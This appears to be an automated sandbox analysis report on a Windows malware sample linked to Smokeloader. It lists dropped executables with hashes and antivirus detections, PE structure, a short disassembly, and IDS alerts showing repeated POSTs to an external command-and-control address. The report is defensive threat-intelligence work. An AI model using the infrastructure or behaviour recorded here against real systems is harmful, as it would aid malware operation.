                                                                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\SysWOW64\explorer.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                      Category:dropped
                                                                      Size (bytes):114688
                                                                      Entropy (8bit):0.9746603542602881
                                                                      Encrypted:false
                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\explorer.exe
                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                      Category:modified
                                                                      Size (bytes):78336
                                                                      Entropy (8bit):6.401797003857336
                                                                      Encrypted:false
                                                                      SSDEEP:1536:qLGRHFXEMV8cTemFnItAeiU5MSOMRSIXD4k:qGiTiU5MjeVx
                                                                      MD5:69C7186C5393D5E94294E39DA1D4D830
                                                                      SHA1:7681B66FBDE2FA796A2129B54F1F3BFA0E025133
                                                                      SHA-256:1B0BE4B4B45A52650502425ABBBA226CBF0CCE5959F7A178189AE9AD79AB6911
                                                                      SHA-512:000691E25AA193B9C5D53EF896524306D74D3DD815A5C335426ABC143DE6BB594BEDF075C0A85925D824F09755B94C7B250F878F93F580302C0E84C137919FCF
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      • Antivirus: ReversingLabs, Detection: 37%
                                                                      Joe Sandbox View:
                                                                      • Filename: v173TV3V11.exe, Detection: malicious, Browse
                                                                      • Filename: 0k3ibTiMjy.exe, Detection: malicious, Browse
                                                                      • Filename: qg5Ddf4an9.exe, Detection: malicious, Browse
                                                                      • Filename: aZPm0tHPTX.exe, Detection: malicious, Browse
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........v....................................b......b......b......Rich............PE..d...^..f.........."..........>.................@.............................p............`..................................................(...............P...............`.......................................................................................text............................... ..`.rdata...&.......(..................@..@.data...h....@......................@....pdata.......P......."..............@..@.reloc.......`.......0..............@..B................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\explorer.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):290443
                                                                      Entropy (8bit):7.999294022563011
                                                                      Encrypted:true
                                                                      SSDEEP:6144:ABuboUzJj9HenRwHdUcX2COmB3mi6g2JL5OM2vtHwh:SuDPHCRw9eC5Blh2JsJQh
                                                                      MD5:150242179246829EDAB33E89796FA87F
                                                                      SHA1:3A0C8B1F4183B5C1046BC35EAD68F17FA6D088A7
                                                                      SHA-256:44C3BC908287966A12A42AC16603B9F0E4FFDE9457F1B02ACC28B0E269A90CC2
                                                                      SHA-512:636F3BD0D6D37F32E56053C8754A72B6A45734F016C706B692C47AD930C05F2076C0D53A75CCB13DD4B4F2F84DF0FC69E526CF13D76F83ACF42B4357C1118AEE
                                                                      Malicious:false
                                                                      Preview:LN...,....MFvo...P......(.I....J..PF.d.KohO].[.hq.h..'.....>../.c..t.5G<If..)6.a.`..D"......hzG.Me...E..k..RS.. e...f0...."..X..U.7......6]..Hmz:MBk.2.wC.4......;..G#[......f...{&r#.,...1...P..n.2.\..F:%.....zq...\@2n.1.....1...7vuS.=w.Vc.'.n..h.m...q......L,..&*')1....l.... P.....{..4...r..%.j..E..."0...Q..p..j.4...........m.....H...lm...~.......X..Nn...4$.9...?;.z.....$..sQM.....FdA...ND&T.....<w8..MrgE.........+....#..* ..[..wL..Pe.."..}..)GL.z.A...{. V......f..s.....{...dh..Bg..do.~..;X.F.'!.[..V....f...REn.9f`.v3....3.yq.bS..Ww.."..'..N...S.8'.V.1*.%_..).1.F.&..<..R..So......h.'i.P.Qr.~B[...\.r.t..3........Q...Jh..V.L.|..x.../.2D.#...6.....Y..t..Z...*L.TL....9.T..N.*...Z......(..Gu....9.Z..3...>.....C-2{. .....[.d v...,..B.Z..d....(c....L=.J.F..R....bS&.h.....].rmhZ.p...ch...`..b.L.~|......_....[..).\..t>.....@...\-.%..I.....Ee.2.*.~./....i.v..~.d.......a.i.P......%.o...j.0M..^P.&.0.FVK.*.a..=.e..PL...^4....Y7..+...`>l.
                                                                      Process:C:\Windows\explorer.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):384512
                                                                      Entropy (8bit):6.976562477801165
                                                                      Encrypted:false
                                                                      SSDEEP:6144:6rkVntaABNOcmGaDOVufNOsGps4qCMasrHBtlFDhTD:+ya0NMfslplxUrHtFDF
                                                                      MD5:43DA422957B397E2805362661AB3FD4A
                                                                      SHA1:D9FCEE0D2A68C509BD8FC8C30EE263DE5C80B883
                                                                      SHA-256:E798106229F6985B40BD436ABAF516360B7D19501F0F8C1CE89A3197EBB421A4
                                                                      SHA-512:164AFBBB93A02FB334C57FEA332255CA8F578CEECE8C5AD22FA552CDC31CF45733ABCE2EBC0E8DB224BF3D3D0B21A344358CC0379ADF1D8AFE4D2DB8E0C7574F
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: Avira, Detection: 100%
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      • Antivirus: ReversingLabs, Detection: 34%
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........k_Zx..Zx..Zx..5...zx..5...|x..5...>x..S...]x..Zx...x..5...[x..5...[x..5...[x..RichZx..........PE..L...*..d.............................<............@..........................P.......%......................................h...P................................................................... ...@............................................text............................... ..`.rdata..............................@..@.data...h........^..................@....rsrc................B..............@..@................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\explorer.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):26
                                                                      Entropy (8bit):3.95006375643621
                                                                      Encrypted:false
                                                                      SSDEEP:3:ggPYV:rPYV
                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                      Malicious:true
                                                                      Preview:[ZoneTransfer]....ZoneId=0
                                                                      Process:C:\Windows\explorer.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):401920
                                                                      Entropy (8bit):6.896981606728238
                                                                      Encrypted:false
                                                                      SSDEEP:6144:HunX9+ryFMNYI7geKHHUxFt4oH9T4iNUTAxfPZO4OXkkjQy4asy4pTf:HuXdFMNYI7gdH03xT4UtYbvQy4Hy4N
                                                                      MD5:B39D75B20F14D8DFCB2325D7082CB2B9
                                                                      SHA1:CF55C38212461E02D7C8E8386CB1C9B2AC195891
                                                                      SHA-256:61FB5D3CEE24C193EC2EE9F73F6222D24A4222DAB4E777EEA02F77B1B261B7C0
                                                                      SHA-512:A9E9BC353CE6F65148FFE2E22FF6748405B74E202AA53395FB1D70F12DCF535051CD51F9D1EF6A3F38DA1320EA48C66DB4CA7B2279BE5E9D992643181DBEC8BE
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: Avira, Detection: 100%
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_.<.>to.>to.>to.H.o.>to.H.o.>to.H.o.>to.F.o.>to.>uo.>to.H.o.>to.H.o.>to.H.o.>toRich.>to........PE..L.....Je.....................D......);.......0....@..........................p.......I..........................................x...................................8...................................@............................................text............................... ..`.data....u...0...b..................@....yatufu..............x..............@....rsrc................|..............@..@................................................................................................................................................................................................................................................................................................................................................................................
                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Entropy (8bit):6.976562477801165
                                                                      TrID:
                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                      File name:veEGy9FijY.exe
                                                                      File size:384'512 bytes
                                                                      MD5:43da422957b397e2805362661ab3fd4a
                                                                      SHA1:d9fcee0d2a68c509bd8fc8c30ee263de5c80b883
                                                                      SHA256:e798106229f6985b40bd436abaf516360b7d19501f0f8c1ce89a3197ebb421a4
                                                                      SHA512:164afbbb93a02fb334c57fea332255ca8f578ceece8c5ad22fa552cdc31cf45733abce2ebc0e8db224bf3d3d0b21a344358cc0379adf1d8afe4d2db8e0c7574f
                                                                      SSDEEP:6144:6rkVntaABNOcmGaDOVufNOsGps4qCMasrHBtlFDhTD:+ya0NMfslplxUrHtFDF
                                                                      TLSH:E184B002E3E37D50E53E4B315D6EC7E4662EB4635E5526AF23282A2F1B701A2D573331
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........k_Zx..Zx..Zx..5...zx..5...|x..5...>x..S...]x..Zx...x..5...[x..5...[x..5...[x..RichZx..........PE..L...*..d...................
                                                                      Icon Hash:7555512941404443
                                                                      Entrypoint:0x403cd9
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                      DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                      Time Stamp:0x64AD062A [Tue Jul 11 07:35:06 2023 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:5
                                                                      OS Version Minor:1
                                                                      File Version Major:5
                                                                      File Version Minor:1
                                                                      Subsystem Version Major:5
                                                                      Subsystem Version Minor:1
                                                                      Import Hash:5c51ec4a6f442a6a3636ad4616307822
                                                                      Instruction
                                                                      call 00007FA72088803Eh
                                                                      jmp 00007FA7208847BEh
                                                                      push dword ptr [00445FFCh]
                                                                      call dword ptr [0040F10Ch]
                                                                      test eax, eax
                                                                      je 00007FA720884934h
                                                                      call eax
                                                                      push 00000019h
                                                                      call 00007FA7208876DBh
                                                                      push 00000001h
                                                                      push 00000000h
                                                                      call 00007FA720885392h
                                                                      add esp, 0Ch
                                                                      jmp 00007FA720885357h
                                                                      mov edi, edi
                                                                      push ebp
                                                                      mov ebp, esp
                                                                      sub esp, 20h
                                                                      mov eax, dword ptr [ebp+08h]
                                                                      push esi
                                                                      push edi
                                                                      push 00000008h
                                                                      pop ecx
                                                                      mov esi, 0040F3D8h
                                                                      lea edi, dword ptr [ebp-20h]
                                                                      rep movsd
                                                                      mov dword ptr [ebp-08h], eax
                                                                      mov eax, dword ptr [ebp+0Ch]
                                                                      pop edi
                                                                      mov dword ptr [ebp-04h], eax
                                                                      pop esi
                                                                      test eax, eax
                                                                      je 00007FA72088493Eh
                                                                      test byte ptr [eax], 00000008h
                                                                      je 00007FA720884939h
                                                                      mov dword ptr [ebp-0Ch], 01994000h
                                                                      lea eax, dword ptr [ebp-0Ch]
                                                                      push eax
                                                                      push dword ptr [ebp-10h]
                                                                      push dword ptr [ebp-1Ch]
                                                                      push dword ptr [ebp-20h]
                                                                      call dword ptr [0040F070h]
                                                                      leave
                                                                      retn 0008h
                                                                      mov edi, edi
                                                                      push ebp
                                                                      mov ebp, esp
                                                                      push ecx
                                                                      push ebx
                                                                      mov eax, dword ptr [ebp+0Ch]
                                                                      add eax, 0Ch
                                                                      mov dword ptr [ebp-04h], eax
                                                                      mov ebx, dword ptr fs:[00000000h]
                                                                      mov eax, dword ptr [ebx]
                                                                      mov dword ptr fs:[00000000h], eax
                                                                      mov eax, dword ptr [ebp+08h]
                                                                      mov ebx, dword ptr [ebp+0Ch]
                                                                      mov ebp, dword ptr [ebp-04h]
                                                                      mov esp, dword ptr [ebx-04h]
                                                                      jmp eax
                                                                      pop ebx
                                                                      leave
                                                                      retn 0008h
                                                                      pop eax
                                                                      pop ecx
                                                                      xchg dword ptr [esp], eax
                                                                      jmp eax
                                                                      pop eax
                                                                      pop ecx
                                                                      xchg dword ptr [esp], eax
                                                                      jmp eax
                                                                      pop eax
                                                                      pop ecx
                                                                      xchg dword ptr [esp], eax
                                                                      jmp eax
                                                                      Programming Language:
                                                                      • [ASM] VS2010 build 30319
                                                                      • [C++] VS2010 build 30319
                                                                      • [ C ] VS2010 build 30319
                                                                      • [IMP] VS2008 SP1 build 30729
                                                                      • [RES] VS2010 build 30319
                                                                      • [LNK] VS2010 build 30319
                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x3f2680x50.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x205b0000x19ba0.rsrc
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x3f2b80x1c.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x3e9200x40.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IAT0xf0000x1d0.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                      .text0x10000xd01d0xd200b0327d72c2a33a0b3a92f69887fb206aFalse0.6009114583333334data6.69478860947354IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                      .rdata0xf0000x30cfc0x30e005c12d8eec6931293ff9b295dd3d2f8d5False0.9344978820332481data7.860270906659414IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .data0x400000x201a2680x5e005fee256725aaf87aeddcbb9b5ddb66e9unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                      .rsrc0x205b0000x19ba00x19c0073f042d26c21d53ac630bf79cf888e2cFalse0.41386339502427183data5.001727947299326IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                      SOJEFEHOZEHUW0x206e1680x136fASCII text, with very long lines (4975), with no line terminatorsTamilIndia0.5961809045226131
                                                                      SOJEFEHOZEHUW0x206e1680x136fASCII text, with very long lines (4975), with no line terminatorsTamilSri Lanka0.5961809045226131
                                                                      RT_CURSOR0x206f5200x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.4375
                                                                      RT_CURSOR0x206f6500xb0Device independent bitmap graphic, 16 x 32 x 1, image size 00.44886363636363635
                                                                      RT_CURSOR0x206f7280xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.27238805970149255
                                                                      RT_CURSOR0x20705d00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.375
                                                                      RT_CURSOR0x2070e780x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5057803468208093
                                                                      RT_CURSOR0x20714100xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.30943496801705755
                                                                      RT_CURSOR0x20722b80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.427797833935018
                                                                      RT_CURSOR0x2072b600x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5469653179190751
                                                                      RT_ICON0x205b9300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilIndia0.43256929637526653
                                                                      RT_ICON0x205b9300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilSri Lanka0.43256929637526653
                                                                      RT_ICON0x205c7d80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilIndia0.5523465703971119
                                                                      RT_ICON0x205c7d80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilSri Lanka0.5523465703971119
                                                                      RT_ICON0x205d0800x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilIndia0.5846774193548387
                                                                      RT_ICON0x205d0800x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilSri Lanka0.5846774193548387
                                                                      RT_ICON0x205d7480x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilIndia0.6011560693641619
                                                                      RT_ICON0x205d7480x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilSri Lanka0.6011560693641619
                                                                      RT_ICON0x205dcb00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilIndia0.44491701244813275
                                                                      RT_ICON0x205dcb00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilSri Lanka0.44491701244813275
                                                                      RT_ICON0x20602580x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilIndia0.4924953095684803
                                                                      RT_ICON0x20602580x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilSri Lanka0.4924953095684803
                                                                      RT_ICON0x20613000x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.5274822695035462
                                                                      RT_ICON0x20613000x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.5274822695035462
                                                                      RT_ICON0x20617d00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilIndia0.3805970149253731
                                                                      RT_ICON0x20617d00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilSri Lanka0.3805970149253731
                                                                      RT_ICON0x20626780x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilIndia0.5090252707581228
                                                                      RT_ICON0x20626780x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilSri Lanka0.5090252707581228
                                                                      RT_ICON0x2062f200x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilIndia0.5702764976958525
                                                                      RT_ICON0x2062f200x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilSri Lanka0.5702764976958525
                                                                      RT_ICON0x20635e80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilIndia0.5845375722543352
                                                                      RT_ICON0x20635e80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilSri Lanka0.5845375722543352
                                                                      RT_ICON0x2063b500x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilIndia0.3744813278008299
                                                                      RT_ICON0x2063b500x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilSri Lanka0.3744813278008299
                                                                      RT_ICON0x20660f80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilIndia0.4129924953095685
                                                                      RT_ICON0x20660f80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilSri Lanka0.4129924953095685
                                                                      RT_ICON0x20671a00x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilIndia0.4077868852459016
                                                                      RT_ICON0x20671a00x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilSri Lanka0.4077868852459016
                                                                      RT_ICON0x2067b280x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.47429078014184395
                                                                      RT_ICON0x2067b280x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.47429078014184395
                                                                      RT_ICON0x20680080xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilIndia0.4936034115138593
                                                                      RT_ICON0x20680080xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilSri Lanka0.4936034115138593
                                                                      RT_ICON0x2068eb00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilIndia0.46705776173285196
                                                                      RT_ICON0x2068eb00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilSri Lanka0.46705776173285196
                                                                      RT_ICON0x20697580x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilIndia0.4342485549132948
                                                                      RT_ICON0x20697580x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilSri Lanka0.4342485549132948
                                                                      RT_ICON0x2069cc00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilIndia0.27852697095435686
                                                                      RT_ICON0x2069cc00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilSri Lanka0.27852697095435686
                                                                      RT_ICON0x206c2680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilIndia0.2861163227016886
                                                                      RT_ICON0x206c2680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilSri Lanka0.2861163227016886
                                                                      RT_ICON0x206d3100x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilIndia0.3081967213114754
                                                                      RT_ICON0x206d3100x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilSri Lanka0.3081967213114754
                                                                      RT_ICON0x206dc980x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.3333333333333333
                                                                      RT_ICON0x206dc980x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.3333333333333333
                                                                      RT_STRING0x20733580x590dataTamilIndia0.4396067415730337
                                                                      RT_STRING0x20733580x590dataTamilSri Lanka0.4396067415730337
                                                                      RT_STRING0x20738e80x5e8dataTamilIndia0.4398148148148148
                                                                      RT_STRING0x20738e80x5e8dataTamilSri Lanka0.4398148148148148
                                                                      RT_STRING0x2073ed00x27edataTamilIndia0.48119122257053293
                                                                      RT_STRING0x2073ed00x27edataTamilSri Lanka0.48119122257053293
                                                                      RT_STRING0x20741500x6eedataTamilIndia0.4295377677564825
                                                                      RT_STRING0x20741500x6eedataTamilSri Lanka0.4295377677564825
                                                                      RT_STRING0x20748400x35edataTamilIndia0.4605568445475638
                                                                      RT_STRING0x20748400x35edataTamilSri Lanka0.4605568445475638
                                                                      RT_ACCELERATOR0x206f4d80x48dataTamilIndia0.8472222222222222
                                                                      RT_ACCELERATOR0x206f4d80x48dataTamilSri Lanka0.8472222222222222
                                                                      RT_GROUP_CURSOR0x206f7000x22data1.0588235294117647
                                                                      RT_GROUP_CURSOR0x20713e00x30data0.9375
                                                                      RT_GROUP_CURSOR0x20730c80x30data0.9375
                                                                      RT_GROUP_ICON0x20617680x68dataTamilIndia0.6826923076923077
                                                                      RT_GROUP_ICON0x20617680x68dataTamilSri Lanka0.6826923076923077
                                                                      RT_GROUP_ICON0x2067f900x76dataTamilIndia0.6779661016949152
                                                                      RT_GROUP_ICON0x2067f900x76dataTamilSri Lanka0.6779661016949152
                                                                      RT_GROUP_ICON0x206e1000x68dataTamilIndia0.7115384615384616
                                                                      RT_GROUP_ICON0x206e1000x68dataTamilSri Lanka0.7115384615384616
                                                                      RT_VERSION0x20730f80x25cdata0.5380794701986755
                                                                      DLLImport
                                                                      KERNEL32.dllGetConsoleAliasExesA, InterlockedIncrement, CreateJobObjectW, InterlockedCompareExchange, SetVolumeMountPointW, GetTimeFormatA, CreateHardLinkA, _lcreat, LocalFlags, SetFileTime, ClearCommBreak, SetFileShortNameW, LoadLibraryW, CopyFileW, _hread, GetCalendarInfoA, SetVolumeMountPointA, GetVersionExW, GetFileAttributesW, VerifyVersionInfoA, GetModuleFileNameW, CreateActCtxA, GetEnvironmentVariableA, RaiseException, LCMapStringA, InterlockedExchange, GetStdHandle, GetLogicalDriveStringsA, GetLastError, GetLocaleInfoA, CreateNamedPipeA, EnumSystemCodePagesW, SetComputerNameA, GlobalFree, LoadLibraryA, InterlockedExchangeAdd, LocalAlloc, SetCalendarInfoW, GetNumberFormatW, CreateEventW, OpenEventA, QueryDosDeviceW, FoldStringA, SetEnvironmentVariableA, GlobalWire, GetCurrentDirectoryA, EnumDateFormatsW, GetShortPathNameW, SetProcessShutdownParameters, GetDiskFreeSpaceExW, ReadConsoleInputW, DebugBreak, GetTempPathA, SetFileAttributesW, CommConfigDialogW, TlsGetValue, SetFilePointer, EnumCalendarInfoA, GetProcAddress, GetComputerNameA, InterlockedDecrement, EncodePointer, DecodePointer, Sleep, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, HeapFree, HeapReAlloc, GetModuleHandleW, ExitProcess, GetCommandLineW, HeapSetInformation, GetStartupInfoW, RtlUnwind, HeapAlloc, WideCharToMultiByte, LCMapStringW, MultiByteToWideChar, GetCPInfo, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, TerminateProcess, GetCurrentProcess, HeapCreate, HeapSize, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, WriteFile, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, GetFileType, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, GetACP, GetOEMCP, IsValidCodePage, GetStringTypeW
                                                                      GDI32.dllGetBkMode, CreateDCW, GetCharWidth32A, GetCharWidthI
                                                                      WINHTTP.dllWinHttpOpen
                                                                      Language of compilation systemCountry where language is spokenMap
                                                                      TamilIndia
                                                                      TamilSri Lanka
                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                      2024-10-03T12:27:27.327428+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44973658.151.148.9080TCP
                                                                      2024-10-03T12:27:30.073115+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44973758.151.148.9080TCP
                                                                      2024-10-03T12:27:32.842482+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44973858.151.148.9080TCP
                                                                      2024-10-03T12:27:34.344677+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44973958.151.148.9080TCP
                                                                      2024-10-03T12:27:37.885580+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44974058.151.148.9080TCP
                                                                      2024-10-03T12:27:39.642687+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44974158.151.148.9080TCP
                                                                      2024-10-03T12:27:41.164522+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44974258.151.148.9080TCP
                                                                      2024-10-03T12:27:42.739696+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44974358.151.148.9080TCP
                                                                      2024-10-03T12:27:44.297714+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44974458.151.148.9080TCP
                                                                      2024-10-03T12:27:45.900693+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44974558.151.148.9080TCP
                                                                      2024-10-03T12:27:47.407549+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44974658.151.148.9080TCP
                                                                      2024-10-03T12:27:49.220848+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44974758.151.148.9080TCP
                                                                      2024-10-03T12:27:51.564100+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44974858.151.148.9080TCP
                                                                      2024-10-03T12:27:54.543734+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44974958.151.148.9080TCP
                                                                      2024-10-03T12:27:56.427760+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44975058.151.148.9080TCP
                                                                      2024-10-03T12:27:58.371820+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44975258.151.148.9080TCP
                                                                      2024-10-03T12:28:00.315752+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44975358.151.148.9080TCP
                                                                      2024-10-03T12:28:02.012344+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44975458.151.148.9080TCP
                                                                      2024-10-03T12:28:04.228656+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44975558.151.148.9080TCP
                                                                      2024-10-03T12:28:05.963555+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44975658.151.148.9080TCP
